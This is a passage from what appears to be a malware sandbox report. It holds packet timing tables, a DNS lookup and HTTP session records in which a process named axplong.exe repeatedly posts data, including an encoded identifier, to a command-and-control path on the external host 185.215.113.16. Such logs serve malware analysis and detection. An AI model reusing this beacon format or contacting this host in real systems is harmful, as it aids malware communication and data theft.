                      Jul 26, 2024 13:44:22.602849960 CEST5366480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:22.609375000 CEST8053664185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:22.609499931 CEST5366480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:22.609695911 CEST5366480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:22.610349894 CEST8053663185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:22.610420942 CEST5366380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:22.614478111 CEST8053664185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:23.420958996 CEST8053664185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:23.421139002 CEST5366480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:23.421750069 CEST5366480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:23.426651955 CEST8053664185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:23.961251974 CEST8053664185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:23.961328030 CEST5366480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:23.962969065 CEST8053664185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:23.963025093 CEST5366480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:24.079319954 CEST5366480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:24.079603910 CEST5366580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:24.084851027 CEST8053665185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:24.084924936 CEST5366580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:24.085014105 CEST5366580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:24.085283041 CEST8053664185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:24.085330963 CEST5366480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:24.089817047 CEST8053665185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:24.838655949 CEST8053665185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:24.838728905 CEST5366580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:24.839737892 CEST5366580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:24.845221996 CEST8053665185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:25.088057995 CEST8053665185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:25.088159084 CEST5366580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:25.196358919 CEST5366580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:25.196712017 CEST5366680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:25.202445984 CEST8053666185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:25.202558994 CEST5366680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:25.202759981 CEST5366680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:25.203347921 CEST8053665185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:25.203401089 CEST5366580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:25.207943916 CEST8053666185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:25.963359118 CEST8053666185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:25.963440895 CEST5366680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:25.963992119 CEST5366680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:25.972852945 CEST8053666185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:26.213289976 CEST8053666185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:26.213413000 CEST5366680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:26.321377039 CEST5366680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:26.321769953 CEST5366780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:26.326904058 CEST8053667185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:26.326997042 CEST5366780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:26.327104092 CEST5366780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:26.328923941 CEST8053666185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:26.328979015 CEST5366680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:26.334388018 CEST8053667185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:27.104212999 CEST8053667185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:27.104268074 CEST5366780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:27.104967117 CEST5366780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:27.110207081 CEST8053667185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:27.351181030 CEST8053667185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:27.351249933 CEST5366780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:27.461833954 CEST5366780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:27.462133884 CEST5366880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:27.467411995 CEST8053668185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:27.467494011 CEST5366880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:27.467495918 CEST8053667185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:27.467540026 CEST5366780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:27.467679024 CEST5366880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:27.473871946 CEST8053668185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:28.213622093 CEST8053668185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:28.213676929 CEST5366880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:28.214281082 CEST5366880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:28.219074965 CEST8053668185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:28.828835964 CEST8053668185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:28.828912973 CEST5366880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:28.831890106 CEST8053668185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:28.831933975 CEST5366880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:28.932487965 CEST5366880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:28.932702065 CEST5366980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:28.938059092 CEST8053669185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:28.938133001 CEST5366980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:28.938251972 CEST5366980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:28.938338041 CEST8053668185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:28.938383102 CEST5366880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:28.943119049 CEST8053669185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:29.698223114 CEST8053669185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:29.698286057 CEST5366980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:29.720066071 CEST5366980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:29.725740910 CEST8053669185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:29.970496893 CEST8053669185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:29.970546007 CEST5366980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:30.087152958 CEST5366980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:30.087475061 CEST5367080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:30.092545986 CEST8053670185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:30.092628956 CEST5367080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:30.092801094 CEST5367080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:30.093269110 CEST8053669185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:30.093317986 CEST5366980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:30.097800970 CEST8053670185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:30.841072083 CEST8053670185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:30.841144085 CEST5367080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:30.841828108 CEST5367080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:30.846713066 CEST8053670185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:31.097278118 CEST8053670185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:31.097393036 CEST5367080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:31.211905003 CEST5367080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:31.212163925 CEST5367180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:31.217534065 CEST8053671185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:31.217600107 CEST5367180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:31.217688084 CEST5367180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:31.217892885 CEST8053670185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:31.217940092 CEST5367080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:31.222512960 CEST8053671185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:31.972146034 CEST8053671185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:31.972253084 CEST5367180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:31.972816944 CEST5367180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:31.977631092 CEST8053671185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:32.220459938 CEST8053671185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:32.220580101 CEST5367180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:32.359344959 CEST5367180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:32.359767914 CEST5367280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:32.366245031 CEST8053671185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:32.366259098 CEST8053672185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:32.366288900 CEST5367180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:32.366324902 CEST5367280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:32.373944998 CEST5367280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:32.379018068 CEST8053672185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:33.154531002 CEST8053672185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:33.154642105 CEST5367280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:33.155664921 CEST5367280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:33.161283016 CEST8053672185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:33.448235035 CEST8053672185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:33.448328972 CEST5367280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:33.556004047 CEST5367280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:33.556339025 CEST5367380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:33.562602043 CEST8053673185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:33.562699080 CEST5367380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:33.562948942 CEST5367380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:33.567953110 CEST8053673185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:33.593986034 CEST8053672185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:33.594057083 CEST5367280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:34.337992907 CEST8053673185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:34.338161945 CEST5367380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:34.338814020 CEST5367380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:34.344204903 CEST8053673185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:34.728729963 CEST8053673185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:34.728806973 CEST5367380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:34.903363943 CEST5367380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:34.907586098 CEST5367480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:35.075078964 CEST8053673185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:35.075233936 CEST5367380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:35.083230972 CEST8053673185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:35.083278894 CEST5367380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:35.083331108 CEST8053674185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:35.083395004 CEST5367480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:35.083563089 CEST5367480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:35.089314938 CEST8053674185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:35.864424944 CEST8053674185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:35.864509106 CEST5367480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:35.865273952 CEST5367480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:35.870832920 CEST8053674185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:36.210395098 CEST8053674185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:36.210453033 CEST5367480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:36.321342945 CEST5367480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:36.321621895 CEST5367580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:36.326736927 CEST8053675185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:36.326834917 CEST5367580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:36.327007055 CEST5367580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:36.328437090 CEST8053674185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:36.328504086 CEST5367480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:36.331924915 CEST8053675185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:37.088550091 CEST8053675185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:37.088628054 CEST5367580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:37.089238882 CEST5367580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:37.094455957 CEST8053675185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:37.337680101 CEST8053675185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:37.337760925 CEST5367580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:37.505548954 CEST5367580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:37.505831003 CEST5367680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:37.527292013 CEST8053676185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:37.527313948 CEST8053675185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:37.527363062 CEST5367680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:37.527381897 CEST5367580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:37.527575970 CEST5367680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:37.532366037 CEST8053676185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:38.278229952 CEST8053676185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:38.278322935 CEST5367680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:38.281565905 CEST5367680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:38.287215948 CEST8053676185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:38.609952927 CEST8053676185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:38.610037088 CEST5367680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:38.711949110 CEST5367680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:38.712349892 CEST5367780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:38.717231989 CEST8053677185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:38.717417955 CEST5367780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:38.717453003 CEST5367780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:38.719286919 CEST8053676185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:38.719342947 CEST5367680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:38.722440958 CEST8053677185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:39.893336058 CEST8053677185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:39.893390894 CEST5367780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:39.896759033 CEST8053677185.215.113.16192.168.2.5
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jul 26, 2024 13:43:28.501430035 CEST | 53 | 60184 | 162.159.36.2 | 192.168.2.5
                      Jul 26, 2024 13:43:29.034353018 CEST | 56672 | 53 | 192.168.2.5 | 1.1.1.1
                      Jul 26, 2024 13:43:29.042918921 CEST | 53 | 56672 | 1.1.1.1 | 192.168.2.5
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Jul 26, 2024 13:43:29.034353018 CEST | 192.168.2.5 | 1.1.1.1 | 0x8571 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Jul 26, 2024 13:43:29.042918921 CEST | 1.1.1.1 | 192.168.2.5 | 0x8571 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                      • 185.215.113.16
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.5 | 53647 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:02.262164116 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:03.059106112 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:03.061624050 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:03.366684914 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.5 | 53648 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:03.522540092 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:04.280569077 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:04.281440020 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:04.540323019 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.5 | 53649 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:04.656502008 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:05.670748949 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:05.672177076 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:05.672499895 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:05.920926094 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.5 | 53650 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:06.032423973 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:06.813628912 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:06.814331055 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:07.068056107 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.5 | 53651 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:07.187690973 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:07.941807985 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:07.942713022 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
